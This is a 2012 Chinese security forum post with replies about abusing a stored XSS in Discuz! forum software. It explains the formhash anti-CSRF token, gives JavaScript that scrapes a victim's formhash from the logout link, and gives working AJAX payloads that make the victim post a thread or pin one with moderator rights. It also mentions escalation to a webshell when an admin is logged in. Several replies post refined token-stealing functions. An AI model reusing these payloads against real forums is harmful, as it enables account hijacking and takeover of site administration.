Discuz xss利用演示( 劫持发帖,置顶帖子等)

  • A+
所属分类:WooYun-Zone

貌似zone里面有个discuz 如何post 发帖的帖子   [link href=”WooYun: Discuz! 储存型XSS可指定用户盗取cookies“] www.wooyun.org/bugs/wooyun-2010-015312[/link]正好看到个dz xss案例  就研究了下

    熟悉discuz的都知道,formhash是一种类似验证码的东西,用来防止从我们网站外部提交数据,但不需要我们手动输入,它在页面打开时就已经生成了,存在一需要提交数据用到的地方的隐藏input里(比如登录、发布文章)。

    我们来看看这货的生成算法

function formhash($specialadd = '') {

  global $_G;

  $hashadd = defined('IN_ADMINCP') ? 'Only For Discuz! Admin Control Panel' : '';

  return substr(md5(substr($_G['timestamp'], 0, -7).$_G['username'].$_G['uid'].$_G['authkey'].$hashadd.$specialadd), 8, 8);

}

时间戳前3位,大概是 100多天的样子,也就是说这货对于同一人来说 100 天内是不变的.

   即可简单获取目标的formhash(算法比较傻逼=.=)

function  getHash(){

   for(var i=0; i<document.links.length; i++)

  {

     if(document.links[i].href.indexOf("action=logout&formhash=")>0)

  {

     hash=document.links[i].href;

  hash=hash.substr(hash.length-8,hash.length);

  break;

  } } }

  接下来的事情就简单了 只要抓取各种包 加上formhash 即可中出

  例如 (使用了一个兼容的ajax库  详见附件)

  劫持发帖

x.post("forum.php?mod=post&action=newthread&fid=2&extra=&topicsubmit=yes","formhash="+hash+"&posttime=1353989838&wysiwyg=1&subject=title&message=aaaaaaaaaaaaaaaa%0D%0A&replycredit_extcredits=0&replycredit_times=1&replycredit_membertimes=1&replycredit_random=100&readperm=&price=&tags=test&rushreplyfrom=&rushreplyto=&rewardfloor=&stopfloor=&creditlimit=&save=&adddynamic=true&usesig=1&allownoticeauthor=1");

  置顶制定帖子

x.post("forum.php?mod=topicadmin&action=moderate&optgroup=1&modsubmit=yes&infloat=yes&inajax=1","frommodcp=&formhash="+hash+"&fid=2&redirect=&listextra=page%3D1&handlekey=mods&moderate[]=12&operations[]=stick&sticklevel=3&expirationstick=&digestlevel=0&expirationdigest=&highlight_color=0&highlight_style[1]=0&highlight_style[2]=0&highlight_style[3]=0&expirationhighlight=&reason=");

  演示视频:http://v.youku.com/v_show/id_XNDg0NDg2MjU2.html

  高清无码:http://pan.baidu.com/share/link?shareid=136314&uk=587894688

  附件下载:http://yaseng.me/wp-content/uploads/2012/12/Csrf-hijacking-admin-demo.rar

   ps1:zone里面可能排版不太好 有性趣下载附件吧

   ps2:其余动作读者可以抓包自行测试之

   ps3:如果管理员同时登陆了后台还可以权限提升或者直接getshell

  1. 1#

    暗夜清风 (轻抚菊花,笑而不语) | 2012-12-06 19:10

    楼主Mjj    +1

  2. 2#

    z7y (小胖子首席鉴黄师) | 2012-12-06 19:10

    @Yaseng 顶~LZ好人,看片留种,哈哈哈,高清无码 求楼下+1

  3. 3#

    期待爱 (这个家伙很精明 连条内裤也没有留下!!!) | 2012-12-06 22:08

    @z7y 看片留种,菊花不捅。

  4. 4#

    _Evil (科普是一种公益行为) | 2012-12-06 23:31

    尼马的 原来研究Dz 发了黑客防线么?

  5. 5#

    0x_Jin (世上人多心不齐) | 2012-12-07 00:14

    function hash(){
      var links=document.links,forms=document.forms;
      for(i in links){
        var ref=links[i].href||'';
        if(ref.indexOf('action=logout&formhash=')>0){
          return ref.substr(ref.length-8,ref.length);
        }
      }
      for(f in forms){
        if(forms[f].formhash){
          return forms[f].formhash.value;
        }
      }
    }

  6. 6#

    Yaseng (看黄片 到 www.yaseng.org) | 2012-12-07 00:50

    @0x_Jin  不错  这个简单多了

  7. 7#

    safe121 (www.safe121.com重開【조선민주주의인민공화국평양직할시평안남도중앙양수기공장】回收懸賞帖金幣,收40%服務費) | 2012-12-07 04:45

  8. 8#

    冉冉升起 (….ing) | 2012-12-10 17:42

    不错!

  9. 9#

    DM_ (http://x0day.me) | 2012-12-10 21:00

    @0x_Jin @Yaseng
    var x=document.getElementsByName("formhash")[0].value;
    节点读取

  10. 10#

    毛毛虫 | 2015-12-25 00:16

    不错,研究中!谢谢大牛!